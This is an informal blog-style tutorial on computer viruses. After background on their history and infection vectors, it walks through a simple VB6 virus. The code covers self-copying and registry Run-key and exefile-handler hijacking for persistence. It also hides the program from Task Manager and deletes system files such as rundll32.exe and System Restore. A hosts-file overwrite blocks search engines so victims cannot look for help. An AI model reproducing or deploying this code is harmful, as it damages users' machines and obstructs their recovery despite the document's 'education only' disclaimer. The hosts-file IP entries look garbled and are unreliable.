OK..... talking about Viruses or Virii is really touchy subject and sometimes maybe taboo but the virus underground has much history as the hacker underground and in earlier provided anti-virus companies with copies of latest viruses to create
signatures. The virus underground earlier sought to separate itself from the hacker underground but i believe the two communites exists dependent and relying on each other as many modern blended threats show.
The virus underground has been active as early as the 1970's and still remains active though has changed faces over the years as much as the hacker underground has. These days it maybe considered a hobby by some and a way of earning some money by others and its considered criminal by some governments but whatever your view or stand is the virus underground will still persist.
Why am i writing this?
Well the answer is really simple, i don't know...anyway the more knowledge you acquire the better you can protect yourself against certain viral attacks. And the next wave or if it's not already being used is corporate espionage using viruses which all companies need to guard against. Imagine a virus or call it malware that runs on your network and informs a third party about the ongoings of your company or even send copies of your documents..i know scary stuff.
How are viruses made?
This one curious argument i came across where the guys actually had very little knowledge of what they were talking about but were still right. A virus can be written in any language....YES any language..Yes even VB6 but ofcourse the more low level the langauge the more control of the system the virus has.
To understand how a virus is made you need to understand what it is first
What is a virus?
A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability.
The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware.
Ok lets break down the different subroutines of a virus.....(NB: am considering a modular design but hey a writer can write a virus the way he feels like, its up to him/her). This is a simplistict view of a virus assuming a non-resident virus. A resident virus would required modification of the different routines.
The different required subroutines of a virus would be:
This is the routine that searches for files to infect on a disk
This routine copies the viral code into the target file or directory depending on the viral spread mechanism.
There are very many vectors of infection used by viruses. Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:
- Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux).
- Volume Boot Records of floppy disks and hard disk partitions
- The master boot record (MBR) of a hard disk
- General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell script files on Unix-like platforms).
- Application-specific script files (such as Telix-scripts)
- System specific autorun script files (such as Autorun.inf file needed to Windows to automatically run software stored on USB Memory Storage Devices).
- Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)
- Cross-site scripting vulnerabilities in web applications
3. anti-detection routines
Various anti-detection routines are employed modern viruses some of which include use of stealth(for example trapping OS messages through API hooking), self modification, polymophic code and many others
I would like to think each virus has a payload even if its annoying the hell out of us or overwriting files, deleting files. Displaying really really annoying windows and the like.....though some writer are really creative.
Where is our simple virus?
Ok...cool down we are getting to that part...now that we know some basic information about viruses let us delve into the evil art of virus writing. Back in the day ...ok not that far back virus writers needed to be conversant with assembly programming or even have advanced skills in c,C++ and such languages but assembly was a must because it provided greater control of the system making
the virus absolutely wicked(read very good). But as years passed more HLL are being employed to create worms, viruses and many forms of malware.
Ok enough yapping lets try to create a simple virus using the old language(not that old) of vb6....follwing the modular design
mentioned above plus modifications.
NB: The code is left intentionally sketchy because of any malicious guys reading this....yeah i know your out there<wink>
1. Search routine
We dont need a search routine because we are not infecting any files
FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
NB: ofcourse a little more intelligence is required....eg detecting when a USB device is plugged in (man i love legacy vb code, its like english)
Ahh forgot on important code...to ensure out virus runs when the system starts...regedit anyone Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
This command will make your application start with windows.
Another startup method??
Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example.
3. anti-detection routine
Really these are all simple lines of code
On Error Resume Next
This command will allow the application to continue running even if an error occurs instead of terminating/closing.
This command will hide the application from even being seen on the victims screen even if your program has it's settings set to Visible|True
App.TaskVisible = False
This command is even better, this command will stop your program from showing up in Task Manager-Applications Tab List, but it will still show up in process list...too bad
Now vb6 was truly beautifully easy and nice...but also nasty if in the wrong hands...lets see some sample payloads
Deleting some system files and control panel elements
Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
Getting rid of System Restore, Rundll(by deleting this file, the victim can no longer view the properties window for any file on his or her computer)
Just something to help stop the victim from google-ing what the virus has done, and getting information or downloads to help rid them of your infection.
Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, "22.214.171.124 126.96.36.199 "
Print #1, "188.8.131.52 www.google.com"
Print #1, "184.108.40.206 www.google.co.uk"
Print #1, "220.127.116.11 www.yahoo.com"
Print #1, "18.104.22.168 www.yahoo.co.uk"
Print #1, "22.214.171.124 www.askjeeves.com"
Print #1, "126.96.36.199 www.altavista.com"
Print #1, "188.8.131.52 www.alltheweb.com"
Print #1, "184.108.40.206 www.msn.com"
Print #1, "220.127.116.11 www.hotmail.com"
Print #1, "18.104.22.168 www.myspace.com"
Print #1, "22.214.171.124 www.plunder.com"
Print #1, "126.96.36.199 www.quicksharing.com"
Print #1, "188.8.131.52 www.myspace.co.uk"
Ok...we can go on and on but the list is endless...its up to the virus writer to be as creative as he wants otherwise you have the basic knowledge but protection from infection even without an anti-virus is possible but with very many creative execution techniques being employed by virus writers its becoming extremly difficult...a more recent example cites a vulnerabilty in adobe
reader whereby malicious code could be executed without the user even opening the file...just keep your anti-virus uptodate.
Till next time.....
This is an anti-virus project being conducted in conjuction with Jospeh of intrusecurity, please give us any suggestions of what you would like your anti-virus to do...or not to do..
check out the project progress at http://cybus.ashemug.com
This information is intended for education purposes and the author is not responsible for any misuse or damage caused if tried on a system without permission.